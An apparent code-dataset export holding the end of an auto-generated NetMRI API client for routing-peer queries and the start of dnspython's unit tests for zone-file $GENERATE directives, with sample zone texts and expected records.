:param op_RPPeerTimestamp: The operator to apply to the field RPPeerTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerTimestamp: If op_RPPeerTimestamp is specified, the field named in this input will be compared to the value in RPPeerTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerTimestamp must be specified if op_RPPeerTimestamp is specified.
:type val_f_RPPeerTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerTimestamp: If op_RPPeerTimestamp is specified, this value will be compared to the value in RPPeerTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerTimestamp must be specified if op_RPPeerTimestamp is specified.
:type val_c_RPPeerTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerType: The operator to apply to the field RPPeerType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerType: Identifies the type of routing peer relationship this is (OSPF, BGP, IGRP). This is distinct from the protocol as some vendors may use different protocol names for similar protocols (IGRP and EIGRP, for example). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerType: If op_RPPeerType is specified, the field named in this input will be compared to the value in RPPeerType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerType must be specified if op_RPPeerType is specified.
:type val_f_RPPeerType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerType: If op_RPPeerType is specified, this value will be compared to the value in RPPeerType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerType must be specified if op_RPPeerType is specified.
:type val_c_RPPeerType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerUpSince: The operator to apply to the field RPPeerUpSince. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerUpSince: The date and time this peer relationship has been active, without interruption. The granularity level varies with each protocol. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerUpSince: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerUpSince: If op_RPPeerUpSince is specified, the field named in this input will be compared to the value in RPPeerUpSince using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerUpSince must be specified if op_RPPeerUpSince is specified.
:type val_f_RPPeerUpSince: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerUpSince: If op_RPPeerUpSince is specified, this value will be compared to the value in RPPeerUpSince using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerUpSince must be specified if op_RPPeerUpSince is specified.
:type val_c_RPPeerUpSince: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RouteProto: The operator to apply to the field RouteProto. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RouteProto: Identifies the routing protocol used for this peer relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RouteProto: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RouteProto: If op_RouteProto is specified, the field named in this input will be compared to the value in RouteProto using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RouteProto must be specified if op_RouteProto is specified.
:type val_f_RouteProto: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RouteProto: If op_RouteProto is specified, this value will be compared to the value in RouteProto using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RouteProto must be specified if op_RouteProto is specified.
:type val_c_RouteProto: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RoutingAreaID: The operator to apply to the field RoutingAreaID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RoutingAreaID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RoutingAreaID: If op_RoutingAreaID is specified, the field named in this input will be compared to the value in RoutingAreaID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RoutingAreaID must be specified if op_RoutingAreaID is specified.
:type val_f_RoutingAreaID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RoutingAreaID: If op_RoutingAreaID is specified, this value will be compared to the value in RoutingAreaID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RoutingAreaID must be specified if op_RoutingAreaID is specified.
:type val_c_RoutingAreaID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device routing proto peers as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceRPPeerID
:param sort: The data field(s) to use for sorting the output. Default is DeviceRPPeerID. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceRoutingProtoPeer. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_routing_proto_peers: An array of the DeviceRoutingProtoPeer objects that match the specified input criteria.
:rtype device_routing_proto_peers: Array of DeviceRoutingProtoPeer
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def peer_device(self, **kwargs):
"""The peer router with which this device exchanges routing data.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The peer router with which this device exchanges routing data.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("peer_device"), kwargs)
def interface(self, **kwargs):
"""The interface over which this peer relationship exists, if available.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The interface over which this peer relationship exists, if available.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def peer_interface(self, **kwargs):
"""The remote router's interface over which this peer relationship exists, if available.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The remote router's interface over which this peer relationship exists, if available.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("peer_interface"), kwargs)
def routing_area(self, **kwargs):
"""The routing area or autonomous system associated with this routing peer relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The routing area or autonomous system associated with this routing peer relationship.
:rtype : RoutingArea
"""
return self.api_request(self._get_method_fullname("routing_area"), kwargs)
def infradevice(self, **kwargs):
"""The device from which this routing peer data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this routing peer data was collected.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def device(self, **kwargs):
"""The device from which this routing peer data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this routing peer data was collected.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
| 56.103299 | 926 | 0.627435 | 12,252 | 103,735 | 5.257917 | 0.030852 | 0.066129 | 0.042984 | 0.072276 | 0.961751 | 0.96082 | 0.929587 | 0.915709 | 0.913241 | 0.91068 | 0 | 0.003983 | 0.293209 | 103,735 | 1,849 | 927 | 56.103299 | 0.874644 | 0.831696 | 0 | 0 | 0 | 0 | 0.063792 | 0.015357 | 0 | 0 | 0 | 0 | 0 | 1 | 0.434783 | false | 0 | 0.043478 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
43c5f9a47e9a546c7a73bccf7c2581e82d740441 | 19,826 | py | Python | tests/test_generate.py | balabit-deps/balabit-os-6-dnspython | c7d01e597f052d6214ce3de99a2b15e87ad62f1b | [
"0BSD"
] | 1 | 2018-05-09T02:01:07.000Z | 2018-05-09T02:01:07.000Z | tests/test_generate.py | balabit-deps/balabit-os-6-dnspython | c7d01e597f052d6214ce3de99a2b15e87ad62f1b | [
"0BSD"
] | 1 | 2017-11-25T14:41:26.000Z | 2017-11-25T19:26:12.000Z | tests/test_generate.py | balabit-deps/balabit-os-6-dnspython | c7d01e597f052d6214ce3de99a2b15e87ad62f1b | [
"0BSD"
] | null | null | null | # Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import sys
sys.path.insert(0, '../') # Force the local project to be *the* dns
import cStringIO
import filecmp
import os
import unittest
import dns.exception
import dns.rdata
import dns.rdataclass
import dns.rdatatype
import dns.rrset
import dns.zone
import pprint
pp = pprint.PrettyPrinter(indent=2)
import pdb
example_text = """$TTL 1h
$ORIGIN 0.0.192.IN-ADDR.ARPA.
$GENERATE 1-2 0 CNAME SERVER$.EXAMPLE.
"""
example_text1 = """$TTL 1h
$ORIGIN 0.0.192.IN-ADDR.ARPA.
$GENERATE 1-10 fooo$ CNAME $.0
"""
example_text2 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 3-5 foo$ A 10.0.0.$
"""
example_text3 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 4-8/2 foo$ A 10.0.0.$
"""
example_text4 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 wp-db${-10,2,d}.services.mozilla.com 0 CNAME SERVER.FOOBAR.
"""
example_text5 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 wp-db${10,2,d}.services.mozilla.com 0 CNAME SERVER.FOOBAR.
"""
example_text6 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 wp-db${+10,2,d}.services.mozilla.com 0 CNAME SERVER.FOOBAR.
"""
example_text7 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 sync${-10}.db IN A 10.10.16.0
"""
example_text8 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-12 wp-db${-10,2,d} IN A 10.10.16.0
"""
example_text9 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-12 wp-db${-10,2,d} IN A 10.10.16.0
$GENERATE 11-13 sync${-10}.db IN A 10.10.16.0
"""
example_text10 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 27-28 $.2 PTR zlb${-26}.oob
"""
class GenerateTestCase(unittest.TestCase):
def testFromText(self):
def bad():
z = dns.zone.from_text(example_text, 'example.', relativize=True)
self.failUnlessRaises(dns.zone.NoSOA, bad)
def testFromText1(self):
def bad():
z = dns.zone.from_text(example_text1, 'example.', relativize=True)
self.failUnlessRaises(dns.zone.NoSOA, bad)
def testIterateAllRdatas2(self):
z = dns.zone.from_text(example_text2, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('foo3', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.3')),
(dns.name.from_text('foo4', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.4')),
(dns.name.from_text('foo5', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.5'))]
exl.sort()
self.failUnless(l == exl)
def testIterateAllRdatas3(self):
z = dns.zone.from_text(example_text3, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('foo4', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.4')),
(dns.name.from_text('foo6', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.6')),
(dns.name.from_text('foo8', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.8'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate1(self):
z = dns.zone.from_text(example_text4, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db01.services.mozilla.com', None),
0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db02.services.mozilla.com', None),
0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db03.services.mozilla.com', None),
0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate2(self):
z = dns.zone.from_text(example_text5, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db21.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db22.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db23.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate3(self):
z = dns.zone.from_text(example_text6, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db21.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db22.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db23.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate4(self):
z = dns.zone.from_text(example_text7, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('sync1.db', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync2.db', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync3.db', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate6(self):
z = dns.zone.from_text(example_text9, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db01', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('wp-db02', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync1.db', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync2.db', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync3.db', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate7(self):
z = dns.zone.from_text(example_text10, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
